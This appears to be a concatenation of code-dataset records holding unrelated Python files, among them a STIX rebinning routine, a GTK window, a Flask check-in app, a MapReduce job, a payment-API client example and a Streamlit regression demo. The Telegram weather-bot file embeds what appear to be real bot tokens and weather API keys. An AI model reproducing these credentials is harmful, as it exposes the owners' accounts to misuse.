     low = []\n        high = []\n        for edge in channel_edges:\n            l, h = edge\n            low.append(ENERGY_CHANNELS[l]['e_lower'])\n            high.append(ENERGY_CHANNELS[h - 1]['e_upper'])\n    elif len(mask) == 32:\n        edges = np.where(np.array(mask) == 1)\n        low_ind = np.min(edges)\n        high_ind = np.max(edges)\n        low = [ENERGY_CHANNELS[low_ind]['e_lower']]\n        high = [ENERGY_CHANNELS[high_ind]['e_upper']]\n    else:\n        raise ValueError(f'Energy mask or edges must have a length of 32 or 33 not {len(mask)}')\n\n    return low, high\n\n\ndef rebin_proportional(y1, x1, x2):\n    x1 = np.asarray(x1)\n    y1 = np.asarray(y1)\n    x2 = np.asarray(x2)\n\n    # the fractional bin locations of the new bins in the old bins\n    i_place = np.interp(x2, x1, np.arange(len(x1)))\n\n    cum_sum = np.r_[[0], np.cumsum(y1)]\n\n    # calculate bins where lower and upper bin edges span\n    # greater than or equal to one original bin.\n    # This is the contribution from the 'intact' bins (not including the\n    # fractional start and end parts).\n    whole_bins = np.floor(i_place[1:]) - np.ceil(i_place[:-1]) >= 1.\n    start = cum_sum[np.ceil(i_place[:-1]).astype(int)]\n    finish = cum_sum[np.floor(i_place[1:]).astype(int)]\n\n    y2 = np.where(whole_bins, finish - start, 0.)\n\n    bin_loc = np.clip(np.floor(i_place).astype(int), 0, len(y1) - 1)\n\n    # fractional contribution for bins where the new bin edges are in the same\n    # original bin.\n    same_cell = np.floor(i_place[1:]) == np.floor(i_place[:-1])\n    frac = i_place[1:] - i_place[:-1]\n    contrib = (frac * y1[bin_loc[:-1]])\n    y2 += np.where(same_cell, contrib, 0.)\n\n    # fractional contribution for bins where the left and right bin edges are in\n    # different original bins.\n    different_cell = np.floor(i_place[1:]) > np.floor(i_place[:-1])\n    frac_left = np.ceil(i_place[:-1]) - i_place[:-1]\n    contrib = (frac_left * y1[bin_loc[:-1]])\n\n    frac_right = i_place[1:] - np.floor(i_place[1:])\n    contrib += (frac_right * y1[bin_loc[1:]])\n\n    y2 += np.where(different_cell, contrib, 0.)\n\n    return y2\n","sub_path":"stix/fits/products/quicklook.py","file_name":"quicklook.py","file_ext":"py","file_size_in_byte":33879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"20083283","text":"import gi\n\ngi.require_version('Gtk','3.0')\nfrom gi.repository import Gtk\n\nclass MiVentana(Gtk.Window):\n\n\tdef 
__init__(self,*args,**kwargs):\n\t\tsuper(MiVentana,self).__init__(*args,**kwargs)\n\t\tself.set_default_size(500,500)\n\t\tself.connect('delete-event',Gtk.main_quit)\n\t\tself.contenedor()\n\t\tself.agregar_widgets()\n\n\n\n\tdef contenedor(self):\n\t\tself.contenedor = Gtk.Grid()\n\t\tself.contenedor.set_column_homogeneous(True)\n\t\tself.add(self.contenedor)\n\n\n\tdef agregar_widgets(self):\n\t\tself.label_user = Gtk.Label('Victoria Usuario ')\n\t\tself.contenedor.attach(self.label_user,0,0,1,1)\n\t\tself.label_maquina = Gtk.Label('Victoria Maquina')\n\t\tself.contenedor.attach(self.label_maquina,0,1,3,1)\n\n\nif __name__ == '__main__':\n\n\tventana = MiVentana()\n\tventana.show_all()\n\tGtk.main()","sub_path":"Python-gtk/juego.py","file_name":"juego.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"74790354","text":"import telebot\nimport pyowm\n\ntoken_bot_Shevnin=\"902452228:AAFxwaA2yilyGl7JppE3pwoe8545SDJ88Ns\"\nAPI_key_Shevnin='7c83d4d6fc0856c7a2ed516b47ebbabd'\n\ntoken_bot_Sim=\"971477626:AAHYok-sna2mJ-UnkEYGGLlyNhcZBZ_1h-o\"\nAPI_key_Sim='9262eaa5e82b734436f39f3e9c42f0bd'\n\nbot = telebot.TeleBot(token_bot_Shevnin)\nowm = pyowm.OWM(API_key_Shevnin, language='ru')\ndef t_9(string):\n    city = string\n    with open(\"citys.txt\", 'r', encoding='utf8') as citys:\n        towns_list = []\n        index_list = []\n        maximum = 0\n        for line in citys:\n            towns_list.append(str(line))\n            city1 = 0\n            city2 = 0\n            index = 0\n            for i in city:\n                if city[city1] == line[city2]:\n                    index += 1\n                city1 += 1\n                city2 += 1\n            index_list.append(index)\n\n        for i in range(len(index_list)):\n            if maximum < index_list[i]:\n                maximum = index_list[i]\n                index = i\n        towns_list = [line.rstrip() for line in towns_list]\n        string_ret = towns_list[index]\n\n    return string_ret\n\n@bot.message_handler(content_types=['text'])\ndef send_weather(message):\n    #answer = \"Добро пожаловать в weatherbot, напиши название города в котором ты находишься \\n\"\n    inputs = message.text.lower()\n    inputs = inputs.title()\n    print(inputs)\n    inputs = t_9(inputs)\n    observation = owm.weather_at_place(inputs)\n    status = observation.get_weather()\n    wind = status.get_wind()[\"speed\"]\n    humidity = status.get_humidity()\n    temp = status.get_temperature('celsius')[\"temp\"]\n    if status.get_detailed_status() ==\"ясно\":\n        emoji = \"☀\"\n    elif status.get_detailed_status() ==\"слегка облачно\":\n        emoji = \"🌤️\"\n    elif status.get_detailed_status() ==\"облачно\":\n        emoji = \"🌥️\"\n    elif status.get_detailed_status() == \"пасмурно\":\n        emoji = \"☁\"\n    elif status.get_detailed_status() == \"гроза\":\n        emoji = \"🌩️\"\n    elif status.get_detailed_status() == \"дождь\":\n        emoji = \"🌧️\"\n    elif status.get_detailed_status() == \"снег\":\n        emoji = \"🌨️\"\n    else:\n        emoji = \"🌦️\"\n\n    answer = \"В городе \" + inputs + \" сейчас: \"+status.get_detailed_status() + emoji +\"\\n\"\n    answer += \"Температура в районе: \" + str(round(temp)) + \"℃\"+\"\\n\"\n    answer += \"Скорость ветра: \" + str(wind) + \"м/с\"+\"\\n\"\n    answer += \"Влажность: \" + str(humidity) + \"%\"\n\n    bot.send_message(message.chat.id, answer)\n\n\nbot.polling(none_stop = True)\n","sub_path":"teleBot.py","file_name":"teleBot.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"492386267","text":"from flask import render_template, redirect, url_for, request, session, flash\nfrom flask import current_app as app\n\nfrom 
app.api.user_manager import UserManager\nfrom app.forms.checkin import CheckInForm, CheckOutForm\nfrom app.api.checkin_manager import CheckInManager\n\n\n@app.route('/checkin_and_out/checkin', methods=['GET', 'POST'])\ndef checkin():\n    if 'booking_user_id' not in session or 'booking_credit_num' not in session:\n        return redirect(url_for('checkin_form'))\n\n    user = UserManager.get_user_by_id(session['booking_user_id'])\n    credit_num = session['booking_credit_num']\n\n    # An exit button should clear the session cookies!!!\n    # del session['booking_user_id']\n    # del session['booking_credit_num']\n\n    bookings = CheckInManager.getBookings(user.details.first_name, user.details.last_name, credit_num)\n\n    if request.method == 'POST':\n        var = int(request.form['r_num'])\n        CheckInManager.check_in(var)\n\n    return render_template('checkin_and_out/AcceptCheckIn.html', bookings=bookings, user=user)\n\n\n@app.route('/checkin_and_out/checkinform', methods=['GET', 'POST'])\ndef checkin_form():\n    form = CheckInForm()\n    if form.validate_on_submit():\n        first_name = form.first_name.data\n        last_name = form.last_name.data\n        credit_num = form.credit_num.data\n\n        # This implementation (for unauthenticated users) works\n        # An alternative could be added for logged in users too\n        bookings = CheckInManager.getBookings(first_name, last_name, credit_num)\n\n        if bookings:\n            user = bookings[0].user\n            session['booking_user_id'] = user.id\n            session['booking_credit_num'] = credit_num\n            return redirect(url_for('checkin'))\n        else:\n            flash('Sorry, the Name or Credit Card number is wrong or no bookings could be found\\n', 'danger')\n\n    return render_template('checkin_and_out/CheckIn.html', fm=form)\n\n\n@app.route('/checkin_and_out/checkoutform', methods=['GET', 'POST'])\ndef checkout():\n    form = CheckOutForm()\n    if form.validate_on_submit():\n        credit_num = form.credit_num.data\n\n        if CheckInManager.check_out(credit_num):\n            return render_template('/checkin_and_out/AcceptCheckOut.html')\n        else:\n            flash('Your credit card number is incorrect or you have no records to checkout', 'danger')\n\n    return render_template('checkin_and_out/CheckOut.html', fm=form)\n","sub_path":"code/app/controllers/frontend/checkin_and_out.py","file_name":"checkin_and_out.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"178549858","text":"import MapReduce\nimport sys\n\n\"\"\"\nAsymmetric Friendship Example in the Simple Python MapReduce Framework\n\"\"\"\n\nmr = MapReduce.MapReduce()\n\n# =============================\n# Do not modify above this line\n\ndef mapper(record):\n    # key: friend A\n    # value: friend B\n    key = record[0]\n    value = record[1]\n    pair_key = hash(key) * hash(value)\n    mr.emit_intermediate(pair_key, record)\n\ndef reducer(key, list_of_values):\n    # key: order-independent hash of the friend pair\n    # value: list of (A, B) records sharing that key\n    if len(list_of_values) < 2: \n        fa = list_of_values[0][0] \n        fb = list_of_values[0][1] \n        mr.emit((fa,fb))\n        mr.emit((fb,fa))\n\n\n# Do not modify below this line\n# =============================\nif __name__ == '__main__':\n    inputdata = open(sys.argv[1])\n    mr.execute(inputdata, mapper, reducer)\n","sub_path":"jsmapreduce/asymmetric_friendship.py","file_name":"asymmetric_friendship.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"559736793","text":"import pandas as pd\nimport numpy as np\n\ndatos = pd.read_csv(\"datosR.csv\")\n\ndatos2 = 
pd.read_csv(\"test_data_1.csv\")\n\ndef get_first_n_rows(dataset, n):\n    \"\"\"Return a DataFrame containing the first n rows of dataset.\"\"\"\n    newData = dataset.head(n)\n    return newData\n\ndef get_last_n_rows(dataset, n):\n    \"\"\"Return a DataFrame containing the last n rows of dataset.\"\"\"\n    newData = dataset.tail(n)\n    return newData\n\ndef remove_cols_with_nulls(dataset):\n    \"\"\"Return dataset with every column that contains null values removed.\"\"\"\n    col_null = dataset.isnull().any()\n    numCol = dataset.columns[col_null]\n    index = numCol.values\n    newData = dataset.drop(index, axis=1)\n    return newData\n\ndef filter_by_col(dataset, column_name, value):\n    \"\"\"Filter dataset, returning a DataFrame that only contains the rows where the value of\n    column column_name equals value.\"\"\"\n    filterData = dataset[dataset[column_name] == value]\n    return filterData\n\n#print(datos) \n\nprint(\"\\n\") \n\nprint(\"Result of get_first_n_rows: \\n\",get_first_n_rows(datos, 2))\nprint(\"*******************************************************************************\")\nprint(\"Result of get_last_n_rows: \\n\",get_last_n_rows(datos, 2))\nprint(\"*******************************************************************************\")\nprint(\"Result of remove_cols_with_nulls: \\n\",remove_cols_with_nulls(datos))\nprint(\"*******************************************************************************\")\nprint(\"Result of filter_by_col: \\n\",filter_by_col(datos, 'apellido', 'Rodriguez'))","sub_path":"pruebasRony.py","file_name":"pruebasRony.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"221523419","text":"from mcash import mapi_client\nfrom mcash.mapi_client.pusherconnector import PusherConnector\nimport sys\nimport time\nimport logging\nimport signal\nimport pprint\nimport uuid\nimport json\n\n\nclass MapiClientExample(object):\n\n    _pos_id = \"winter_warming_stand_1\"\n\n    def handleSigINT(self, signal, frame):\n        logging.info(\"got SIGINT, shutting down\")\n        # Give the callback client a chance to exit cleanly\n        self.callback_client.stop()\n        sys.exit(0)\n\n    def shortlink_scanned(self, data):\n        \"\"\"Called when a shortlink_scanned event is received\n        \"\"\"\n        # Inform log that we received an event\n        self.logger.info(\"Received shortlink_scanned event\")\n\n        data = json.loads(data)\n        customer_token = str(data['object']['id'])\n        response = self.mapiclient.create_payment_request(\n            customer=customer_token,\n            currency=\"NOK\",\n            amount=\"20.00\",\n            allow_credit=True,\n            pos_id=self._pos_id,\n            pos_tid=str(uuid.uuid4()),\n            action='auth',\n            expires_in=90,\n            callback_uri=\"pusher:m-winterwarming-pos_callback_chan\",\n            text='Have some hot chocolate!')\n        self._tid = response['id']\n        print(str(self._tid))\n\n    def payment_authorized(self, data):\n        self.logger.info(\"Received payment_authorized event\")\n        pprint.pprint(data)\n\n        if self._tid is not None:\n            self.mapiclient.update_payment_request(\n                tid=str(self._tid),\n                action='capture')\n\n    def pusher_connected(self, data):\n        \"\"\"Called when the pusherclient is connected\n        \"\"\"\n        # Inform user that pusher is done connecting\n        self.logger.info(\"Pusherclient connected\")\n\n        # Bind the events we want to listen to\n        self.callback_client.bind(\"payment_authorized\",\n                                  self.payment_authorized)\n        self.callback_client.bind(\"shortlink_scanned\",\n                                  self.shortlink_scanned)\n\n    def main(self):\n        # set the log level to DEBUG, so we don't miss a thing\n        self.logger = 
logging.getLogger('simpleexample')\n self.logger.setLevel(logging.DEBUG)\n\n # Handle interrupt signals cleanly\n signal.signal(signal.SIGINT, self.handleSigINT)\n\n # Set up a callback client, pusherclient in this case\n self.callback_client = PusherConnector(\n pusher_api_key='', # Your pusher API key\n callback_chan='m-winterwarming-pos_callback_chan', # chan to use\n logger=self.logger)\n\n # Listen to the pusherclient connected signal, so we can use it to\n # later connect our other listeners\n self.callback_client.pusher_connected_listeners.append(\n self.pusher_connected)\n\n # Set up the mAPI client\n self.mapiclient = mapi_client.MapiClient(\n auth=mapi_client.RsaSha256Auth('rsakey'), # RSA encryption is preferred\n mcash_merchant='exampleshop', # The merchant id we use\n mcash_user='admin', # The user to use for our merchant\n base_url='https://mcashtestbed.appspot.com/merchant/v1',\n additional_headers={\n 'X-Testbed-Token': # mcash testbed needs a token\n ''\n },\n logger=self.logger\n )\n\n # Create a shortlink\n self.mapiclient.create_shortlink(\n callback_uri=\"pusher:m-winterwarming-pos_callback_chan\")\n\n #uris, next_url, prev = self.mapiclient.get_shortlinks()\n pprint.pprint(self.mapiclient.get_all_shortlinks())\n\n # Sleep forever so we can keep listening to pusher signals\n while True:\n time.sleep(1)\n\n\nif __name__ == '__main__':\n # Instantiate and run our example\n mapiclientexample = MapiClientExample()\n mapiclientexample.main()\n","sub_path":"mcash/mapi_client/mapi_client_example.py","file_name":"mapi_client_example.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"31576815","text":"from django.conf.urls.defaults import *\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Example:\n # (r'^rynir/', include('rynir.foo.urls')),\n (r'^/?$', 'althingi.views.index'),\n (r'^fundur/(?P\\d+)/$', 'althingi.views.fundur'),\n (r'^scrape/(?Phttps?)(?::/)?/(?P[^/]+)/(?P.*)$',\n 'althingi.scraper.scrape'),\n (r'^scrape/bootstrap$', 'althingi.scraper.bootstrap'),\n\n # Uncomment the next line to enable the admin:\n (r'^admin/', include(admin.site.urls)),\n)\n","sub_path":"rynir/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"307912996","text":"#!/usr/bin/python3\n\"\"\"\npremium question\n\"\"\"\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def __init__(self):\n self.exists = False\n self.root = None # need to handle 0\n self.total_sum = None\n\n def checkEqualTree(self, root: TreeNode) -> bool:\n \"\"\"\n two passes\n 1st pass, get total sum\n 2nd pass, check whether has sum/2\n space: O(log N)\n\n two save 2nd pass, store sums\n space: O(N)\n \"\"\"\n self.root = root\n self.total_sum = self.dfs(root)\n self.dfs(root)\n return self.exists\n\n def dfs(self, node):\n if not node:\n return 0\n\n l = self.dfs(node.left)\n r = self.dfs(node.right)\n s = l + r + node.val\n if node != self.root and self.total_sum != None and self.total_sum == s * 2:\n self.exists = True\n\n return s\n","sub_path":"663 Equal Tree Partition.py","file_name":"663 Equal Tree 
Partition.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"375560897","text":"from flask import Flask, url_for, render_template, request, Markup\nimport os\nimport json\n\napp = Flask(__name__)\n\nwith open('health.json') as health_data:\n    diseases = json.load(health_data)\n\n@app.route(\"/\")\ndef render_main():\n    return render_template('home.html')\n@app.route(\"/p1\")\ndef render_page1():\n    if \"disease\" not in request.args:\n    \n        return render_template('page1.html', disease = disease_lifetime())\n    else:\n        chosen_disease = request.args[\"disease\"]\n        return render_template('page1.html', disease = disease_lifetime(), startlast = str(disease_start(chosen_disease)) +\"-\"+ str(disease_end(chosen_disease)))\n    \n@app.route(\"/p2\")\ndef render_page2():\n    return render_template('page2.html', Measles = measles_infectivity(),Polio = polio_infectivity(),Smallpox = smallpox_infectivity(), Pertuissis = pertuissis_infectivity())\n    \n@app.route(\"/p3\")\ndef render_page3():\n    return render_template('page3.html')\n\n\n\t\n \ndef disease_lifetime():\n    listOfDiseases = []\n    for x in diseases:\n        if not x[\"disease\"] in listOfDiseases:\n            listOfDiseases.append(x[\"disease\"])\n    start = \"\"\n    for x in listOfDiseases:\n        start = start + Markup(\"<option value='\" + x + \"'>\" + x + \"</option>\")\n    return start \n    \n\n    \ndef disease_start(chosen_disease): \n    first = 3000\n    last = 0\n    for x in diseases:\n        if x[\"year\"] < first and chosen_disease == x[\"disease\"]:\n            first = x[\"year\"]\n    return first\n    \ndef disease_end(chosen_disease): \n    last = 0\n    for x in diseases:\n        if x[\"year\"] > last and chosen_disease == x[\"disease\"]:\n            last = x[\"year\"]\n    return last\n\ndef measles_infectivity():\n    increase = \"\"\n    average = 0\n    all = {}\n    \n    for disease in diseases:\n        if disease[\"disease\"]== \"MEASLES\":\n            if disease[\"year\"] in all:\n                all[disease[\"year\"]] += disease[\"increase\"]\n            else:\n                all[disease[\"year\"]] = disease[\"increase\"]\n    for x in all:\n        all[x] = all[x]/50\n        \n        increase = increase + Markup(\"{ x: new Date(\"+(str(x))+\", 00), y:\"+ str(all[x])+\" },\")\n    return increase\n    \n    \n\ndef polio_infectivity():\n    increase = \"\"\n    average = 0\n    all = {}\n    \n    for disease in diseases:\n        if disease[\"disease\"]== \"POLIO\":\n            if disease[\"year\"] in all:\n                all[disease[\"year\"]] += disease[\"increase\"]\n            else:\n                all[disease[\"year\"]] = disease[\"increase\"]\n    for x in all:\n        all[x] = all[x]/50\n        \n        increase = increase + Markup(\"{ x: new Date(\"+(str(x))+\", 00), y:\"+ str(all[x])+\" },\")\n    return increase\n    \n    \ndef smallpox_infectivity():\n    increase = \"\"\n    average = 0\n    all = {}\n    \n    for disease in diseases:\n        if disease[\"disease\"]== \"SMALLPOX\":\n            if disease[\"year\"] in all:\n                all[disease[\"year\"]] += disease[\"increase\"]\n            else:\n                all[disease[\"year\"]] = disease[\"increase\"]\n    for x in all:\n        all[x] = all[x]/50\n        \n        increase = increase + Markup(\"{ x: new Date(\"+(str(x))+\", 00), y:\"+ str(all[x])+\" },\")\n    return increase \n\ndef pertuissis_infectivity():\n    increase = \"\"\n    average = 0\n    all = {}\n    \n    for disease in diseases:\n        if disease[\"disease\"]== \"PERTUSSIS\":\n            if disease[\"year\"] in all:\n                all[disease[\"year\"]] += disease[\"increase\"]\n            else:\n                all[disease[\"year\"]] = disease[\"increase\"]\n    for x in all:\n        all[x] = all[x]/50\n        \n        increase = increase + Markup(\"{ x: new Date(\"+(str(x))+\", 00), y:\"+ str(all[x])+\" },\")\n    return increase \n\n    \n    \n    \nif __name__==\"__main__\":\n    
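# Start the Flask development server; debug=True enables the interactive debugger and auto-reload.\n    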
app.run(debug=True)\n","sub_path":"webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"283996115","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Variant 3\n# Given a text, count the occurrences of the letter 'и' in the first sentence.\n# Consider two cases:\n# it is known that the sentence contains the letter 'и';\n# the text may not contain the letter 'и' at all.\nif __name__ == '__main__':\n    p = input(\"Enter a sentence: \")\n    c = 0\n    for i in p:\n        if i == 'и':\n            c += 1\n    if c > 0:\n        print(f\"{c}\")\n    else:\n        print(\"There is no letter 'и'\")\n","sub_path":"iz_2.py","file_name":"iz_2.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"204544144","text":"import Adafruit_CharLCD\nimport RPi.GPIO as GPIO\nimport libPiInput.libPiInput as input\nimport interface\nfrom player_variables import *\n\nRotaryEncoder = input.RotaryEncoder.Worker(RE_A, RE_B)\nRotaryEncoderButton = input.Button.Worker(Button_RE)\nButton = input.Button.Worker(Button_Left)\nPowerButton = input.Button.Worker(Button_Power)\n\nRotaryEncoder.start()\nRotaryEncoderButton.start()\nButton.start()\nPowerButton.start()\n\nlcd = Adafruit_CharLCD.Adafruit_RGBCharLCD(lcd_rs, lcd_en, lcd_d4, lcd_d5, lcd_d6, lcd_d7,lcd_columns, lcd_rows, lcd_red, lcd_green, lcd_blue, enable_pwm=True)\nlcd.set_color(LCD_red, LCD_green, LCD_blue)\n\nminiplayer = interface.Interface(lcd, lms_server, lms_player)\n#miniplayer.start()\n\nminiplayer.ui.optimize_redraw = True\nminiplayer.ui.print_all()\n\n\nwhile True:\n    if Button.get_response():\n        miniplayer.user_input(1, True)\n    if PowerButton.get_response():\n        miniplayer.user_input(9, True)\n        print(\"Power\")\n    RE_delta = RotaryEncoder.get_delta()\n    if RE_delta != 0:\n        miniplayer.user_input(3, RE_delta)\n    if RotaryEncoderButton.get_response():\n        miniplayer.user_input(2, True)\n    miniplayer.redraw()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"492386267","text":"class Solution(object):\r\n    def isPalindrome(self, x):\r\n        \"\"\"\r\n        :type x: int\r\n        :rtype: bool\r\n        \"\"\"\r\n        \r\n        if x<0 or (x!=0 and x%10==0):\r\n            return False\r\n        \r\n        # reverse algorithm\r\n        sum = 0\r\n        \r\n        while x>sum:\r\n            sum = sum*10 + x%10\r\n            x = int(x/10)\r\n            #print(x,sum)\r\n        \r\n        if sum == x or x == int(sum/10):\r\n            return True\r\n        else:\r\n            return False\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n    test = Solution()\r\n    print(test.isPalindrome(515))\r\n","sub_path":"isPalindrome.py","file_name":"isPalindrome.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"137883588","text":"import cv2 \nimport os 
 \ncam = cv2.VideoCapture(\"./1.mp4\") \ncam2 = cv2.VideoCapture(\"./2.mp4\") \n \ntry: \n   \n    if not os.path.exists('data'): \n        os.makedirs('data') 
 \nexcept OSError: \n    print ('Error: Creating directory of data') \n \ncurrentframe = 0\nwhile(True): \n   \n    ret,frame = cam.read() \n    ret2,frame2=cam2.read()\n    if ret or ret2: \n        if ret:\n            name = './data/frame' + str(currentframe).zfill(3) + '.jpg'\n            print ('Creating 1 ...' + name) 
 \n            cv2.imwrite(name, frame) \n            currentframe += 1\n        if ret2:\n            name = './data/frame' + str(currentframe).zfill(3) + '.jpg'\n            print ('Creating 2 ...' 
+ name) \n \n cv2.imwrite(name, frame2) \n currentframe += 1\n\n else: \n break","sub_path":"extract_stereo_vido.py","file_name":"extract_stereo_vido.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"455952941","text":"import random\n\ndef drunk_walk(n):\n x = 0\n y = 0\n directions = [\"N\", \"S\", \"E\", \"W\"]\n for i in range(0,n):\n direction = random.choice(directions)\n if direction == \"N\":\n y += 1\n #print x, y\n elif direction == \"S\":\n y -= 1\n #print x, y\n elif direction == \"E\":\n x += 1\n #print x, y\n elif direction == \"W\":\n x -= 1\n #print x, y\n return x, y\n\n\ndef get_distance(end_points):\n #argument is a tuple of two integers\n a = end_points[0]\n b = end_points[1]\n c = ((a**2)+(b**2))**.5\n return c\n\n\ndef get_mean_distance(walks, steps):\n distances = []\n for i in range(walks):\n d = get_distance(drunk_walk(steps))\n distances.append(d)\n return sum(distances)/len(distances)\n","sub_path":"drunk_walk.py","file_name":"drunk_walk.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"270308317","text":"import subprocess\r\nimport time\r\n\r\nfor i in range(0,1):\r\n\t\r\n\ttime.sleep(0.5)\r\n\tsubprocess.Popen([\"python27.exe\",\"./Tibia_Bot_mouse(magia).py\"])\r\n\ttime.sleep(0.5)\r\n\tsubprocess.Popen([\"python27.exe\",\"./Tibia_Bot_teclado(andar).py\"])\r\n\r\n\t","sub_path":"2014/08_Tibia_Bot/Tibia_Bot.py","file_name":"Tibia_Bot.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"98007786","text":"#! python3\r\n#rock paper scissors\r\n\r\nimport random\r\n\r\nRPS=['rock','paper','scissors'] #list of choices\r\n\r\nI=0 #computer score\r\nYou=0 #player score\r\ngame=0 #keeps track of game number\r\nprint('I challenge you to rock paper scissors, best 2 out of 3!')\r\nwhile game<=2: #loops for 3 rounds\r\n print('rock paper scissors!')\r\n player=input()\r\n computer=random.choice(RPS)\r\n print(computer)\r\n if player==computer:\r\n print('its a tie!')\r\n game-=1 #makes sure there can be no tie at the end\r\n\r\n #sets the rules of rock paper scissors and tracks wins \r\n elif player=='rock':\r\n if computer=='paper':\r\n print('I win!')\r\n I+=1\r\n elif computer=='scissors':\r\n print('You win')\r\n You+=1\r\n elif player=='paper':\r\n if computer=='rock':\r\n print('you win')\r\n You+=1\r\n elif computer=='scissors':\r\n print('I win!')\r\n I+=1\r\n elif player=='scissors':\r\n if computer=='rock':\r\n print('I win!')\r\n I+=1\r\n elif computer=='paper':\r\n print('you win')\r\n You+=1\r\n \r\n game+=1\r\nprint('I won '+str(I)+' games, and you won '+str(You)+' games')\r\nif I>You:\r\n print('I beat you!')\r\nelse:\r\n print('You are clearly very good at this game')\r\n\r\n#im basically a wizard\r\n \r\n\r\n\r\n","sub_path":"rockPaperScissors.py","file_name":"rockPaperScissors.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"610325840","text":"import streamlit as st\nfrom utils import main\nimport pandas as pd\n\nif __name__ == \"__main__\":\n\n st.title('CDA Assignment \"Linear Regression\"')\n st.write('BTS')\n st.write('Roberto Arenal')\n #df=main().plot()\n\n st.subheader('Distribution of target variable:')\n plots = main()\n fig = plots.plot_hist()\n 
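# Render the matplotlib histogram of the target variable inside the Streamlit page.\n    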
st.pyplot(fig)\n\n    st.subheader('Correlation heatmap:')\n    fig2 = plots.plot_heat()\n    st.pyplot(fig2)\n\n    st.subheader('Linear Regression:')\n    option = st.radio('Select features:',['Time on Website', 'Time on App'], index=0)\n    fig3, rmse_train, r2_train, rmse_test, r2_test = plots.linear_reg(option)\n    st.pyplot(fig3)\n    st.write('RMSE ', 'training set: ',rmse_train, 'test set: ',rmse_test)\n    st.write('R2 score ','training set: ', r2_train, 'test set: ',r2_test)\n\n    st.subheader('Multivariate Linear Regression')\n    options = st.multiselect('Select features:',['Avg. Session Length','Time on Website', 'Time on App','Length of Membership'],\n    ['Time on App','Avg. Session Length','Length of Membership'])\n    if st.button('Execute'):\n        rmse_train, r2_train, rmse_test, r2_test, coef = plots.linear_reg_mult(options)\n        coef=pd.DataFrame(coef, columns=options)\n        st.write('Coefficients: ',coef.T)\n        st.write('RMSE ', 'training set: ',rmse_train, 'test set: ',rmse_test)\n        st.write('R2 score ','training set: ', r2_train, 'test set: ',r2_test)\n\n    st.sidebar.write('The target variable is normally distributed, and there is no need to remove outliers.')\n    st.sidebar.markdown('**The company should focus on the App, since the web page does not contribute positively to the Sales.**')\n    st.sidebar.write('The Length of Membership is the feature that impacts Sales the most')\n    st.sidebar.write('Coefficients Interpretation:')\n    st.sidebar.write('- With all other variables held constant, if the length of membership increases by 1, Sales will increase by 61.68' )\n    st.sidebar.write('- With all other variables held constant, if the time on app increases by 1, sales will increase by 38.27')\n    st.sidebar.write('- With all other variables held constant, if the avg. session length increases by 1, sales will increase by 25.66')\n    st.sidebar.write('Before investing in the app, the company should invest in developing a strategy to retain their current members and increase their loyalty. This is because what impacts sales the most is the Length of Membership, meaning that loyal customers are the ones who buy more. Later on, the company can invest in the app, doing something to increase the amount of time that the user spends. 
